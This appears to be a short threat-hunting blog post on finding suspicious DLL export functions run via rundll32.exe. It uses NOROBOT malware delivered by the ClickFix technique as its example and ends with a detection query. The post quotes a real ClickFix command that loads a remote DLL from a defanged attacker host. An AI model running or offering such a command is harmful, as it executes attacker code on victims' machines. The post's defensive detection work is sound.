294. Hunting for Suspicious DLL Export Functions

Hello everyone!

I noted a few times that one of my favorite threat hunting targets is rundll32.exe. And there's another interesting point about it - export functions.

In many cases DLL export functions may be very interesting and suspicious, and may be worth to be documented.

Let's look at an example - NOROBOT. The adversary delivered it via ClickFix technique. The victim should have executed the following command:

rundll32.exe \\inspectguarantee[.]org\check\iamnotarobot.dll,humanCheck

As you can see, it has a very interesting export function name - "humanCheck". Why not to use it to build a query?

event_type: "processcreatewin"

AND

proc_file_path: "rundll32.exe"

AND

cmdline: "humancheck"

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge